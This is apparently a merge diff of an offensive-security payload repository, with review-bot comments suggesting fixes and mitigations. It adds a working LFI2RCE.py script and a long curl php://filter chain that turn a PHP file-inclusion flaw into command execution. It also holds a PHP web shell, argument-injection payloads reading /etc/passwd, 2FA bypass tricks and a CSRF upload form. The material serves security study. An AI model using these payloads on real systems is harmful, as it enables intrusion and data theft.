Merge branch 'master' into patch-4
.gitignore
@ -1,4 +1,3 @@
BuildPDF/
.vscode
.todo
AWS Amazon Lambda/
.todo
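Review bot: the hunk drops `AWS Amazon Lambda/` from `.gitignore` (the lone `.todo` entry is kept), so anything under that directory becomes trackable by git; confirm this is intended and that the directory holds no local config, credentials or build output before it is committed.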
@ -24,15 +24,16 @@
## Tools

- [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
- [KeyHacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
- [TruffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
```ps1
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
trufflehog git https://github.com/trufflesecurity/trufflehog.git
trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2
```

- [Trivy - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets](https://github.com/aquasecurity/trivy)

## Exploit

The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.

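Review bot: the `--token GITHUB_TOKEN` argument in the last `trufflehog github` line reads like a literal value; write it as `--token "$GITHUB_TOKEN"` or mark it as a placeholder, and add a line noting that a real token passed on the command line ends up in shell history and process listings (an environment variable or a config file is the safer way to supply it). The fence is tagged `ps1` although these are docker/bash commands; `bash` would be the correct tag. The two list entries that only change capitalisation (`Keyhacks` to `KeyHacks`, `truffleHog` to `TruffleHog`) are fine.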
@ -159,10 +159,10 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws
## References

* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
* [Bug Bounty Survey - AWS Basic test](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
* [Guardzilla video camera hardcoded AWS credential ~~- 0dayallday.org~~ - blackmarble.sh](https://blackmarble.sh/guardzilla-video-camera-hard-coded-aws-credentials/)
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)

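Review bot: the replacement archive link for "Bug Bounty Survey - AWS Basic test" points to status `860102244171227136`, whereas the entry it replaces pointed to `859389553211297792`; `860102244171227136` is the "Windows RCE spaceless" tweet cited in the Command Injection references, so the AWS entry now archives the wrong tweet. Also the new Guardzilla entry keeps `~~- 0dayallday.org~~` (markdown strikethrough) inside the link text; the old source name should simply be removed from the title.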
@ -27,6 +27,7 @@
* [Backup Code Abuse](#backup-code-abuse)
* [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page)
* [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions)
* [Bypass 2FA by Force Browsing](#bypass-2fa-by-force-browsing)
* [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000)
* [Bypass 2FA with array](#bypass-2fa-with-array)
* [References](#references)
@ -228,6 +229,10 @@ Iframing the 2FA Disabling page and social engineering victim to disable the 2FA

If the session is already hijacked and there is a session timeout vuln

### Bypass 2FA by Force Browsing

If the application redirects to `/my-account` url upon login while 2Fa is disabled, try replacing `/2fa/verify` with `/my-account` while 2FA is enabled to bypass verification.

### Bypass 2FA with null or 000000
Enter the code **000000** or **null** to bypass 2FA protection.

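Review bot: the new "Bypass 2FA with null or 000000" section states the trick without the condition that makes it work; one sentence saying that the server accepts an empty or type-juggled value as a valid code (for example a loose `==` comparison, or no check that a code is present and has the expected length), and that strict type and length validation plus a constant-time comparison against the issued code closes it, would make the entry useful to readers fixing the bug. Formatting: the other sections have a blank line between the heading and the body, this one does not, and the context line above still carries the `2Fa` typo.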
@ -257,8 +262,9 @@ Enter the code **000000** or **null** to bypass 2FA protection.

## References

- [10 Password Reset Flaws - Anugrah SR](http://anugrahsr.me/posts/10-Password-reset-flaws/)
- [10 Password Reset Flaws - Anugrah SR](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
- [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=gzM4wWA7RFo&feature=youtu.be)
- [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28)
- [Hacking Grindr Accounts with Copy and Paste - Troy HUNT & Wassime BOUIMADAGHENE - 03 OCTOBER 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)
- [CTFd Account Takeover](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
- [2FA simple bypass](https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass)
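Review bot: the new "2FA simple bypass" entry is a PortSwigger lab, not a write-up; the other pages touched by this merge (CSRF, CORS, Command Injection, File Inclusion) put these under a separate `## Labs` section, so this page should do the same for consistency. The `anugrahsr.me` to `anugrahsr.github.io` link swap is fine.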
Argument Injection/README.md
@ -0,0 +1,89 @@
# Argument Injection
Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.

It can happen in different situations, where you can only inject arguments to a command:

- Improper sanitization (regex)
- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
- Bash expansion (ex: *)

In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
```py
from shlex import quote,split
import sys
import subprocess

if __name__=="__main__":
command = ['curl']
command = command + split(sys.argv[1])
print(command)
r = subprocess.Popen(command)
```
It is possible for an attacker to pass several words to abuse options from ```curl``` command
```ps1
python python_rce.py "https://www.google.fr -o test.py"
```
We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
```ps1
['curl', 'https://www.google.fr', '-o', 'test.py']
```
## Summary

* [List of exposed commands](#list-of-exposed-commands)
* [TAR](#TAR)
* [CURL](#CURL)
* [WGET](#WGET)
* [References](#references)


## List of exposed commands

### CURL
It is possible to abuse ```curl``` through the following options:

```ps1
-o, --output <file> Write to file instead of stdout
-O, --remote-name Write output to a file named as the remote file
```
In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.

### TAR
For the ```tar``` command it is possible to inject arbitrary arguments in different commands.

Argument injection can happen into the '''extract''' command:
```ps1
--to-command <command>
--checkpoint=1 --checkpoint-action=exec=<command>
-T <file> or --files-from <file>
```

Or in the '''create''' command:
```ps1
-I=<program> or -I <program>
--use-compres-program=<program>
```
There are also short options to work without spaces:
```ps1
-T<file>
-I"/path/to/exec"
```

### FIND
Find some_file inside /tmp directory.
```php
$file = "some_file";
system("find /tmp -iname ".escapeshellcmd($file));
```

Print /etc/passwd content.
```php
$file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file));
```


## References

- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930)
- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
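Review bot: the Summary links `#TAR`, `#CURL` and `#WGET` will not resolve, because GitHub generates lowercase anchors (`#tar`, `#curl`), and the list does not match the sections: `WGET` is listed but has no section, while `FIND` has a section but no entry. In the TAR section `--use-compres-program` is misspelled (the GNU tar option is `--use-compress-program`) and `'''extract'''` / `'''create'''` use wiki-style triple quotes instead of backticks. The fences around shell commands are tagged `ps1`; `bash` would be correct. Prose: "passed to to a command", "splited". Since the page describes a bug class, a short mitigation line would round it off: keep user input a single argument (`escapeshellarg` rather than `escapeshellcmd`, a list rather than `shlex.split` of the whole string), reject values that start with `-`, and terminate the option list with `--` where the tool supports it; the FIND example is the ideal place to say that `escapeshellcmd` escapes shell metacharacters but does nothing against extra arguments.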
@ -244,6 +244,13 @@ function reqListener() {
};
```

## Labs

* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)

## Bug Bounty reports

* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
@ -103,6 +103,9 @@ Remainder:
* %E5%98%BE = %3E = \u563e (>)
* %E5%98%BC = %3C = \u563c (<)

## Labs

* [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)

## Exploitation Tricks
* Try to search for parameters that lead to redirects and fuzz them
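Review bot: the new lab entry uses the raw URL as its own link text, unlike the `## Labs` lists added to the other pages in this merge, which use the lab title; a title derived from the slug (HTTP/2 request splitting via CRLF injection) would keep the lists consistent.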
@ -11,6 +11,7 @@
* [HTML GET - No User Interaction)](#html-get---no-user-interaction)
* [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
* [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
* [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
* [JSON GET - Simple Request](#json-get---simple-request)
* [JSON POST - Simple Request](#json-post---simple-request)
* [JSON POST - Complex Request](#json-post---complex-request)
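Review bot: while adding the multipart entry, the first context line `HTML GET - No User Interaction)` still carries a stray `)` in its link text; worth fixing in the same change. The new anchor `#html-post---multipartform-data-with-file-upload---requiring-user-interaction` matches how GitHub slugs the heading (the `/` is dropped), so it will resolve.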
@ -67,6 +68,27 @@ When you are logged in to a certain site, you typically have a session. The iden
</script>
```

### HTML POST - multipart/form-data with file upload - Requiring User Interaction

```html
<script>
function launch(){
const dT = new DataTransfer();
const file = new File( [ "CSRF-filecontent" ], "CSRF-filename" );
dT.items.add( file );
document.xss[0].files = dT.files;

document.xss.submit()
}
</script>

<form style="display: none" name="xss" method="post" action="<target>" enctype="multipart/form-data">
<input id="file" type="file" name="file"/>
<input type="submit" name="" value="" size="0" />
</form>
<button value="button" onclick="launch()">Submit Request</button>
```


### JSON GET - Simple Request

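Review bot: `new File([...], "CSRF-filename")` is created without a `type`, so the file part is sent with no declared MIME type; if the page means to illustrate a target that checks the part's Content-Type, the example should pass the options argument, `new File([...], "CSRF-filename", { type: "text/plain" })`. The defensive point worth stating beside the example is that `multipart/form-data` is one of the form content types a browser sends cross-origin without a preflight, so a file-upload endpoint needs the same CSRF token or `SameSite` cookie protection as any other form handler. Minor: `document.xss[0]` depends on the file input being the first control in the form; `document.xss.file` (by name) would survive a reordering.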
@ -138,6 +160,18 @@ Referer: https://attacker.com/csrf.html;trusted.domain.com
Referer: https://trusted.domain.com.attacker.com/csrf.html
```

## Labs

* [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses)
* [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method)
* [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present)
* [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session)
* [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie)
* [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie)
* [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present)
* [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken)


## References

- [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
@ -53,11 +53,11 @@ Any formula can be started with

## References

* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection)
* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)

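Review bot: the two replaced entries keep their old titles: the new OWASP URL is the `CSV_Injection` attack page and the new Google page is the `csv-formula-injection` article, while the link text still says "CSV Excel Macro Injection"; aligning the titles with the destination pages avoids two entries that look identical apart from the URL. While here, the "CSV Injection -> Meterpreter on Pornhub" context entry points at a third-party PDF mirror (news.webamooz.com); the original write-up should be cited if it is still available.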
@ -1,5 +1,9 @@
# Common Vulnerabilities and Exposures

## Tools

- [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve)

## Big CVEs in the last 5 years.

### CVE-2017-0144 - EternalBlue
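Review bot: the Trickest entry describes an automated collection of CVEs and PoCs; one clause warning that automatically collected PoCs are unvetted code and belong in an isolated lab would fit this Tools section. Also the heading `## Big CVEs in the last 5 years.` has a trailing period none of the other headings use.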
@ -297,9 +297,18 @@ echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
```

## Labs

* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)

## References

* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
* [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
* [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection)
@ -194,6 +194,14 @@ The following log files are controllable and can be included with an evil payloa
/var/log/sshd.log
/var/log/mail
```
## Labs

* [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
* [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
* [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
* [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
* [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
* [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)

## References

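Review bot: `## Labs` directly follows the closing fence of the log-file list with no blank line in between; the `## Labs` sections added to the other pages in this merge are separated from the preceding block by a blank line, and some markdown renderers need it to start a new block.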
File Inclusion/LFI2RCE.py
@ -0,0 +1,60 @@
import requests

url = "http://localhost:8000/chall.php"
file_to_use = "/etc/passwd"
command = "id"

#<?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"

conversions = {
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
}


# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"


for c in base64_payload[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"

filters += "convert.base64-decode"

final_payload = f"php://filter/{filters}/resource={file_to_use}"

with open('payload', 'w') as f:
f.write(final_payload)

r = requests.get(url, params={
"0": command,
"action": "include",
"file": final_payload
})

print(r.text)
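Review bot: `conversions` only covers the characters that occur in the hard-coded `PD89YCRfR0VUWzBdYDs7Pz4` payload, so anyone who edits `base64_payload` to a PHP snippet containing another base64 character gets a bare `KeyError` in the loop; either document that limitation in the header comment or fail with a message naming the unsupported character. `url`, `file_to_use` and `command` are hard-coded, and the `action=include` parameter belongs to the `chall.php` challenge the script was written against while the README example calls `index.php?0=id&file=`; taking them as command-line arguments and offering a generate-only mode would fix both, since the script currently writes `payload` to the working directory and fires the request unconditionally. The `requests.get` call has no `timeout`, and the header comment should credit the filter-chain construction it implements (the @loknop gist cited in the README references).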
@ -140,7 +140,7 @@ http://example.com/index.php?page=php://filter/convert.base64-encode/resource=in
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
```

can be chained with a compression wrapper for large files.
Wrappers can be chained with a compression wrapper for large files.

```powershell
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
@ -155,16 +155,28 @@ NOTE: Wrappers can be chained multiple times using `|` or `/`:
curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
```

Also there is a way to turn the `php://filter` into a full RCE. Use [LFI2RCE.py](./LFI2RCE.py) to generate a custom payload.

```powershell
# vulnerable file: index.php
# vulnerable parameter: file
# executed command: id
# executed PHP code: <?=`$_GET[0]`;;?>
curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UT
F8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.i
conv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"
```


### Wrapper zip://

```python
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
1. Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
2. Zip the file
```python
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
```
3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php
```

### Wrapper data://

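Review bot: the zip section shows both the old fenced block (`echo ... > payload.php;` through `rm payload.php`) and the new numbered steps; if the old block is not the removed side of the edit, the commands are now duplicated, and in either case the ```python fence around `zip`/`mv`/`rm` and the ```powershell fence around the `curl` example should be tagged `bash`. The LFI2RCE paragraph would benefit from one sentence for the defensive reader: `php://filter` chains work with a default `php.ini` (unlike remote wrappers they are not gated by `allow_url_include`), so the only reliable control is never to build the include path from user input and to allow-list the files that may be included.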
@ -175,6 +187,7 @@ NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`


### Wrapper expect://

```powershell
@ -182,6 +195,7 @@ http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```


### Wrapper input://

